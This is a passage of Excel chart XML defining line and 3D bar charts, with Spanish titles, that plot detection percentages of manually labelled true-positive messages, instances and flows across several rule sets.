            <c:dispRSqr val="0"/>
            <c:dispEq val="0"/>
          </c:trendline>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$K$74:$N$74</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$K$109:$N$109</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="715633639"/>
        <c:axId val="1102977839"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="715633639"/>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1102977839"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1102977839"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="0.6"/>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715633639"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart10.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN MENSAJES TP (Manual) / RuleSet</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Porcentaje Total</c:v>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$K$83:$N$83</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$K$84:$N$84</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Porcentaje Promedio</c:v>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:trendline>
            <c:name>Tendencia de Porcentaje Promedio</c:name>
            <c:spPr>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="B6D7A8">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
            <c:trendlineType val="linear"/>
            <c:dispRSqr val="0"/>
            <c:dispEq val="0"/>
          </c:trendline>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$K$83:$N$83</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$K$118:$N$118</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1983545066"/>
        <c:axId val="803554595"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="1983545066"/>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803554595"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="803554595"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="0.6"/>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983545066"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart1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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN INSTANCIAS TP (Manual) / RuleSet</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Porcentaje Total</c:v>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:dPt>
            <c:idx val="0"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="0"/>
              <c:layout>
                <c:manualLayout>
                  <c:xMode val="edge"/>
                  <c:yMode val="edge"/>
                  <c:x val="0.13918113409722782"/>
                  <c:y val="0.9014000000692314"/>
                </c:manualLayout>
              </c:layout>
              <c:numFmt formatCode="General" sourceLinked="1"/>
              <c:txPr>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr lvl="0">
                    <a:defRPr/>
                  </a:pPr>
                </a:p>
              </c:txPr>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
            </c:dLbl>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$K$92:$N$92</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$K$93:$N$93</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Porcentaje Promedio</c:v>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="none"/>
          </c:marker>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:trendline>
            <c:name/>
            <c:spPr>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="B6D7A8">
                    <a:alpha val="40000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
            <c:trendlineType val="linear"/>
            <c:dispRSqr val="1"/>
            <c:dispEq val="1"/>
          </c:trendline>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$K$92:$N$92</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$K$127:$N$127</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1828323792"/>
        <c:axId val="740337767"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="1828323792"/>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740337767"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="740337767"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="0.6"/>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828323792"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart1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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO FLUJOS TP (Manual) - RS1</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$S$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$S$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$T$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$T$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$U$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$U$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$V$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$V$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$W$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$W$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$X$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$X$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="6"/>
          <c:order val="6"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$Y$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumOff val="30000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$Y$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="7"/>
          <c:order val="7"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$Z$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumOff val="30000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$Z$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="8"/>
          <c:order val="8"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$AA$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:lumOff val="30000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$AA$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="9"/>
          <c:order val="9"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$AB$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumOff val="30000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="0"/>
              <c:layout>
                <c:manualLayout>
                  <c:xMode val="edge"/>
                  <c:yMode val="edge"/>
                  <c:x val="0.5253008578374447"/>
                  <c:y val="0.6313706869262425"/>
                </c:manualLayout>
              </c:layout>
              <c:numFmt formatCode="General" sourceLinked="1"/>
              <c:txPr>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr lvl="0">
                    <a:defRPr/>
                  </a:pPr>
                </a:p>
              </c:txPr>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
            </c:dLbl>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$AB$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="10"/>
          <c:order val="10"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$AC$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumOff val="30000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$AC$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="11"/>
          <c:order val="11"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$AD$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumOff val="30000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$AD$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="12"/>
          <c:order val="12"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$AE$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$AE$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="13"/>
          <c:order val="13"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$AF$131</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$AF$136</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1857011827"/>
        <c:axId val="578384666"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="1857011827"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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578384666"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="578384666"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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857011827"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart1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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO FLUJOS TP (Manual) - RS2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:axId val="1193124473"/>
        <c:axId val="926509991"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="1193124473"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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926509991"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="926509991"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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193124473"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart14.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO FLUJOS TP (Manual) - RS3</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:axId val="1467906659"/>
        <c:axId val="34034772"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="1467906659"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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34034772"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="34034772"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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467906659"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart15.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO FLUJOS TP (Manual) - RS4</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:axId val="681176604"/>
        <c:axId val="1068823795"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="681176604"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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1068823795"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1068823795"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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681176604"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
